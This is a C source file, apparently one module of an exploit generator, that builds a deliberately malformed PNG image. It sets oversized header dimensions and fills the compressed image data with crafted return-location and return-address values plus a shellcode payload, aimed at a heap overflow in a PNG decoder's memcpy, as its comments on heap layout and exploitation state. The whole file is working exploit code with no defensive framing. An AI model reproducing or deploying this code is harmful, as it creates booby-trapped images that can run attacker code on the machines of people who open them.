#include <zlib.h>
#include "ximage.h"

/*
 * a png chunk looks like:
 * [ 4 byte len ]   - just the length of data     
 * [ 4 byte id  ]   - identifies chunk data type
 * [ 0+ data    ]   - chunk specific data
 * [ 4 byte crc ]   - covers the id and data
 *
 * +crc covers id and data
 * +len covers data
 */

/* identifies a file as a png */
#define MAJIC_LEN sizeof(png_majic)
u_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a };

/* png id fields */
#define ID_LEN sizeof(png_ihdr_id)
u_char png_ihdr_id[] = { 73, 72, 68, 82 };
u_char png_idat_id[] = { 73, 68, 65, 84 };
u_char png_iend_id[] = { 73, 69, 78, 68 };


/*
 * the iHDR chunk.  image information.
 */
#define IHDR_LEN sizeof(png_ihdr)
struct _png_ihdr {
    uint32_t    len,
                id,
                width,
                height;
    uint8_t     bit_depth,
                color_type,
                compress_meth,
                filter_meth,
                interlace_meth;
    uint32_t    crc;
} __attribute__((packed));
typedef struct _png_ihdr png_ihdr;


/*
 * the iEND chunk. contains no data.
 */
#define IEND_LEN sizeof(png_iend)
struct _png_iend {
    uint32_t    len,
                id,
                crc;
} __attribute__((packed));
typedef struct _png_iend png_iend;


/* zlib error handling */
void zerror(int errnum)
{
    switch(errnum){
        case Z_ERRNO:
            fprintf(stderr, "zlib error\n");
            break;
        case Z_STREAM_ERROR:
            fprintf(stderr, "error in zstream\n");
            break;
        case Z_DATA_ERROR:
            fprintf(stderr, "error in zdata\n");
            break;
        case Z_BUF_ERROR:
            fprintf(stderr, "error in zbuffer\n");
            break;
        case Z_VERSION_ERROR:
            fprintf(stderr, "zversion error\n");
            break;
        default:
            fprintf(stderr, "unknow zlib error\n");
            break;
    }

    exit(EXIT_FAILURE);
}

void zcheck(int x)
{
    if((x) < 0) zerror((x));
    else if((x) == Z_STREAM_END);
    else fprintf(stderr, "uhoh\n");
}

/* 
 * given len bytes data already decompressed, return a properly filled in iDAt
 * chunk.
 */
u_char * png_idat_get(u_char *data, u_long len)
{
    int chunk_len = 0;
    uint32_t    *idatp = NULL;
    u_char  *p = NULL;

    /* allocate the output chunk */
    chunk_len = len + 12/* id + len + crc */;
    p = malloc(chunk_len);
    if(p == NULL)
        die("malloc");
    idatp = (uint32_t *)p;

    *idatp++ = htonl(len);                 /* len */
    *idatp++ = *(uint32_t *)png_idat_id;    /* id */
    memcpy(idatp, data, len);              /* data */
    *(uint32_t *)(p+len+8) = htonl(crc32(0, p+4, chunk_len-4));    /* crc */

    return p;
}


/*  
 *  the size of this data affects the heap layout and exploitation
 */
void create_evil_buf(u_char *buf, int len, ximage_t *xp)
{
    int x = 0,  plen = 0;
    u_long  *echunk =  NULL;

    /*
     * nothing special to do this time around, different transformation options
     * here, only pass through png_do_brg(), and we avoid the trans. done in
     * there as well.
     */

    /* get massive chunk */
    echunk = get_chunks(len - 512, xp->retloc, xp->retaddr);
    
    /* copy it out to buffer */
    memcpy(buf, echunk, len - 512);
    free(echunk);
    
    /* add payload payload */
    plen = strlen(xp->payload);
    for(x = len - 512; x < len; x++)
        buf[x] = xp->payload[x%plen];
}


/*
 */
void idata_decomp(ximage_t *xp, int len)
{
    int n = 0;
    u_char  *inbuf = NULL;
    z_stream    *zp = (z_stream *)xp->priv;

    /* allocate input buffer */
    inbuf = malloc(len);
    if(inbuf == NULL)
        die("malloc");

    /* create buffer */
    create_evil_buf(inbuf, len, xp);
    zp->next_in = inbuf;
    zp->avail_in = len;

    /* allocate output buffer */
    zp->opaque = zp->next_out = malloc(len<<2);
    if(zp->next_out == NULL)
        die("malloc");
    zp->avail_out = len<<2;

    /* deflate the data */
    while( (n = deflate(zp, Z_FINISH)) == Z_OK) ;

    zcheck(n);

    /* pass the compressed data back */
    xp->buf = zp->opaque;
    xp->buflen = zp->total_out;

    free(inbuf);
}

/*
 * create the evil png file
 */
int ximage_png_fill(ximage_t *xp)
{
    int len = 0, idat_len = 0;
    u_char  *idatp = NULL;
    png_ihdr    ihdr;
    png_iend    iend;

    /* the iHDR chunk */
    ihdr.len = htonl(0xd);
    memcpy(&ihdr.id, png_ihdr_id, ID_LEN);
    ihdr.height = htonl(0x7ffff);
    ihdr.width = htonl(0x2000);
    ihdr.bit_depth = 8;
    ihdr.color_type = 0/* GRAY */;
    ihdr.compress_meth = 0x0;
    ihdr.filter_meth = 0x0;
    ihdr.interlace_meth = 0x0;
    ihdr.crc = htonl(crc32(0, (u_char *)&ihdr.id, 17));

    /*
     * the iDATA chunk data. must be at least around 50000 bytes to trigger the
     * memcpy() call.
     */
    idata_decomp(xp, 30000);
    idatp = png_idat_get(xp->buf, xp->buflen);
    idat_len = xp->buflen + 12/* chunk: id, len, crc */;
    free(xp->buf);
    
    /* the iEND chunk */
    iend.len = htonl(0x0);
    memcpy(&iend.id, png_iend_id, ID_LEN);
    iend.crc = htonl(crc32(0, (u_char *)&iend.id, 4));

    /* allocate output buffer */
    len = MAJIC_LEN + IHDR_LEN + idat_len + IEND_LEN;
    xp->buf = calloc(1, len);
    if(xp->buf == NULL)
        die("calloc");
    xp->buflen = len;

    /* 
     * create buffer:
     * png id - png ihdr - png idat - png iend
     */
    len = 0;
    memcpy(xp->buf, png_majic, MAJIC_LEN);
    len += MAJIC_LEN;
    memcpy(xp->buf+len, &ihdr, IHDR_LEN);
    len += IHDR_LEN;
    memcpy(xp->buf+len, idatp, idat_len);
    len += idat_len;
    memcpy(xp->buf+len, &iend, IEND_LEN);
    len += IEND_LEN;

    free(idatp);
    return 0;
}

/* 
 */
int ximage_png_clean(ximage_t *xp)
{
    free(xp->priv);
    free(xp->buf);
    return 0;
}

/*
 */
int ximage_png_init(ximage_t *xp)
{
    int n = 0;
    z_stream *zp = NULL;

    /* setup zstream */
    zp = malloc(sizeof(*zp));
    if(zp == NULL)
        die("malloc");
    xp->priv = (void *)zp;

    n = deflateInit(zp, Z_DEFAULT_COMPRESSION);
    if(n != Z_OK)
        zerror(n);

    return 0;
}
